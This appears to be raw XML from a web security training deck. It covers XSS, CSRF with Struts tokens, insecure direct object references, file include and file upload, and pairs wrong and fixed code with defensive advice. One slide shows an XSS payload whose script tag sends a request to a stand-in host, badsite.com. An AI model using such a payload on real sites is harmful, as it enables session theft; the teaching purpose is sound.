            <p:cNvPr id="51" name="Striped Right Arrow 50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="18198336">
              <a:off x="6941378" y="2547559"/>
              <a:ext cx="1015487" cy="428625"/>
            </a:xfrm>
            <a:prstGeom prst="striped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2" name="Picture 35" descr="Funny Guy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645275" y="2603097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3" name="Group 52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="460375" y="1548262"/>
            <a:ext cx="3371850" cy="1301750"/>
            <a:chOff x="460375" y="1417638"/>
            <a:chExt cx="3371850" cy="1301750"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="54" name="Picture 2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0375" y="1417638"/>
              <a:ext cx="3371850" cy="130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54" descr="humongousinsurance-Blake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9309" y="2114775"/>
              <a:ext cx="2640733" cy="139866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449262" y="3227433"/>
            <a:ext cx="1943100" cy="1981200"/>
            <a:chOff x="449262" y="3096809"/>
            <a:chExt cx="1943100" cy="1981200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="Picture 2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9262" y="3096809"/>
              <a:ext cx="1943100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57" descr="Mary email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5894" y="3983321"/>
              <a:ext cx="1077541" cy="118785"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="Picture 23" descr="ekufo2mp[1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12984" y="3337218"/>
            <a:ext cx="898525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90025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in Action: "Defacement"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 8" descr="untitl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954" y="2159354"/>
            <a:ext cx="8244021" cy="464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Group 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1813344" y="4008052"/>
            <a:ext cx="3752487" cy="1595887"/>
            <a:chOff x="3472" y="-1584"/>
            <a:chExt cx="2440" cy="1204"/>
          </a:xfrm>
        </p:grpSpPr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4464" y="-1584"/>
              <a:ext cx="1448" cy="1192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3472" y="-1584"/>
              <a:ext cx="1448" cy="1192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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="Picture 9" descr="Untitled-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88" y="-1584"/>
              <a:ext cx="1906" cy="1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" name="Picture 30" descr="Numbered Balls green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62002" y="4043717"/>
            <a:ext cx="476748" cy="49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2" descr="small round yellow glo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06115" y="5689954"/>
            <a:ext cx="1326535" cy="109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small round yellow glo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88352" y="2273654"/>
            <a:ext cx="1326536" cy="109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Group 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3209925" y="1428528"/>
            <a:ext cx="5480050" cy="704850"/>
            <a:chOff x="3209925" y="1066800"/>
            <a:chExt cx="5480050" cy="704850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rounded Rectangle 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3209925" y="1066800"/>
              <a:ext cx="5480049" cy="704850"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3125"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:effectLst>
              <a:outerShdw blurRad="40005" dist="20320" dir="5400000" algn="ctr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prstMaterial="matte">
              <a:bevelT w="0" h="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endParaRPr lang="en-US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321198" y="1125250"/>
              <a:ext cx="5368777" cy="5847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fr-FR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/location=&lt;script&gt;document.images[4].src=</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="fr-FR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"http://www.badsite.com/news.jpg"&lt;/script&gt;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36" name="Picture 4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6819" y="2997765"/>
            <a:ext cx="6470155" cy="1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2" descr="red arrow broke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-7260271" flipH="1" flipV="1">
            <a:off x="4682238" y="4561563"/>
            <a:ext cx="2937881" cy="115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" name="Group 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1089798" y="2258422"/>
            <a:ext cx="2372404" cy="1365286"/>
            <a:chOff x="1089798" y="2037366"/>
            <a:chExt cx="2372404" cy="1365286"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Striped Right Arrow 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="19731111">
              <a:off x="1449483" y="2037366"/>
              <a:ext cx="2012719" cy="341701"/>
            </a:xfrm>
            <a:prstGeom prst="striped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Picture 48" descr="Funny Guy2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89798" y="2511071"/>
              <a:ext cx="891581" cy="891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79696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Cross Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23556" name="Right Arrow 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2362200"/>
            <a:ext cx="1371600" cy="46038"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 4965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2971800" y="54864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Wrong Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2355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63" y="1931716"/>
            <a:ext cx="5814971" cy="342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564" y="1524000"/>
            <a:ext cx="4519521" cy="239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1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Cross Site Scripting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Right Arrow 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2362200"/>
            <a:ext cx="1371600" cy="46038"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 4965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2971800" y="56388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Fixed Code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97" y="1767017"/>
            <a:ext cx="6320213" cy="371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598" y="1566862"/>
            <a:ext cx="4826202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71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25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CSRF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5570756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Cross Site Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Attacking site causes browser to make a request to target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>User logs into banking.co.nz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>banking.co.nz sets an authentication cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>User leaves but doesn’t log out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>User browses to attacking site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Attacking site creates a post to banking.co.nz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Users browser sends cookie with post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Browser is already authenticated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Defence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Each post must contain a random parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>value</a:t>
            </a:r>
          </a:p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2978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CSRF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5078313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" dirty="0" smtClean="0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1534407"/>
            <a:ext cx="7695909" cy="479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91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CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Right Arrow 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2362200"/>
            <a:ext cx="1371600" cy="46038"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 4965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2971800" y="54864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Wrong Code</a:t>
            </a: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002044"/>
            <a:ext cx="5730438" cy="3372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86814"/>
            <a:ext cx="4419600" cy="237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TextBox 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1036637" y="4911441"/>
            <a:ext cx="7650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http://localhost:8084/TestStruts/HelloStruts2World.action?userName=123</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26826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CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="Right Arrow 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2362200"/>
            <a:ext cx="1371600" cy="46038"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 4965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2971800" y="55626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Fixed Code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612206"/>
            <a:ext cx="6585033" cy="387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5" y="1394886"/>
            <a:ext cx="5070475" cy="268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TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="4191000"/>
            <a:ext cx="6934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http://localhost:8084/TestStruts/HelloStruts2World.action? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=123&amp;</a:t>
            </a:r>
          </a:p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struts.token.name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struts.token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struts.token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=B154AN2E6MWVG74SZLZCGXN0RHF2546F</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16056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19475"/>
            <a:ext cx="4191000" cy="3238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Insecure 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Direct Object Reference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1"/>
            <a:ext cx="4142363" cy="3200400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39042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Web Security Introduction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083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en-US" sz="1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57200" y="2514600"/>
            <a:ext cx="1219200" cy="1447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/>
              <a:t>Web Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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000500" y="1981200"/>
            <a:ext cx="1219200" cy="2514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/>
              <a:t>Web  App</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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467600" y="1752600"/>
            <a:ext cx="1219200" cy="1447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/>
              <a:t>Database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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7467600" y="3276600"/>
            <a:ext cx="1219200" cy="1447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/>
              <a:t>File</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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Left-Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2286000"/>
            <a:ext cx="2286000" cy="484188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  <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Query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1676400" y="2590800"/>
            <a:ext cx="2286000" cy="4841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  <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Left-Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3783013"/>
            <a:ext cx="2286000" cy="484187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  <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>I/O</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Right Arrow 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1676400" y="3352800"/>
            <a:ext cx="2286000" cy="4841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  <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response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219200" y="1667667"/>
            <a:ext cx="1066800" cy="665163"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 46985"/>
              <a:gd name="adj2" fmla="val 10017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Validation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929980" y="1447800"/>
            <a:ext cx="1242220" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33096"/>
              <a:gd name="adj2" fmla="val 12431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Query Control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914400" y="4464050"/>
            <a:ext cx="1257300" cy="587375"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 72431"/>
              <a:gd name="adj2" fmla="val -17300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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangular Callout 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="4811712"/>
            <a:ext cx="1519237" cy="522288"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 67560"/>
              <a:gd name="adj2" fmla="val -17411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 Access Control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438400" y="1485900"/>
            <a:ext cx="1600200" cy="1028699"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39148"/>
              <a:gd name="adj2" fmla="val 6259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Tx/>
              <a:buChar char="-"/>
              <a:defRPr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Injection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XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-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CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:defRPr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Path traversal</a:t>
            </a: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6248401" y="1447800"/>
            <a:ext cx="1219199" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -48705"/>
              <a:gd name="adj2" fmla="val 13034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SQL Injection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Crytography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6248401" y="4811712"/>
            <a:ext cx="1752599" cy="522288"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -29728"/>
              <a:gd name="adj2" fmla="val -17098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Tx/>
              <a:buChar char="-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Path Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-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Upload, download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pP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2660650" y="4464050"/>
            <a:ext cx="1295400" cy="587375"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41396"/>
              <a:gd name="adj2" fmla="val -16983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Tx/>
              <a:buChar char="-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XSS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2962275" y="54864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Technology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962275" y="54864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Threat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962275" y="54864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Defender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30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4" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="5" grpId="0" animBg="1"/>
      <p:bldP spid="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" grpId="0" animBg="1"/>
      <p:bldP spid="3" grpId="1" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="1" animBg="1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Insecure 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Direct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Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37892" name="Right Arrow 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2362200"/>
            <a:ext cx="1371600" cy="46038"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 4965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2971800" y="54864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Fixed Code</a:t>
            </a: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76141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5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Insecure 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Direct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Object Reference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8" name="Right Arrow 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2362200"/>
            <a:ext cx="1371600" cy="46038"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 4965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2971800" y="54864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Wrong Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="368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74984"/>
            <a:ext cx="7700962" cy="180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5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 smtClean="0"/>
              <a:t>File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51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File Include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893647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Local file include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Occurs when user can affect or supply a file path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Leads to disclosure of source and other sensitive items</a:t>
            </a:r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r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Remote file include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Occurs in PHP (usually), when an HTTP reference is provided</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Is disabled in modern versions of PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1" smtClean="0"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1" smtClean="0"/>
              <a:t>LoadControl</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Can be used to load arbitrary controls that exist on server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>If you must accept paths from a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Reject anything that is suspect. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>; ../../  ..\..\  %xx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 Slide </a:t>
            </a:r>
            <a:fld id="{5164247A-B3D9-4B2F-B057-2FE0F1FB8783}" type="slidenum">
              <a:rPr lang="en-NZ"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld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1066800" y="2819400"/>
            <a:ext cx="5715000" cy="642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http://site.com/help.jsp?helppage=/help/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ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File Access: LFI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31748" name="Right Arrow 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2362200"/>
            <a:ext cx="1371600" cy="46038"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 4965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2971800" y="54864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Wrong Code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74121"/>
            <a:ext cx="6219825" cy="3936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38400"/>
            <a:ext cx="5572125" cy="77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8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File Access: LFI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2" name="Right Arrow 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2362200"/>
            <a:ext cx="1371600" cy="46038"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 4965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2971800" y="54864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Fixed code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586680"/>
            <a:ext cx="5943599" cy="389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01925"/>
            <a:ext cx="61722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7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File Uploading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154984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File uploading is dangerous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Provides the ability for the user to create data on server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Usual attacks involve uploading a script file for access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Check the file extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Check the portion after the last .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Compare against WHITELIST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Check the file data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Valid graphic, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1" smtClean="0"/>
              <a:t>csv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>, numeric data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Store as blob in database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Do NOT store as raw file under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1" smtClean="0"/>
              <a:t>webroot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6286500" y="2776538"/>
            <a:ext cx="2286000" cy="1643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Beware The NULL (%00) byte</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
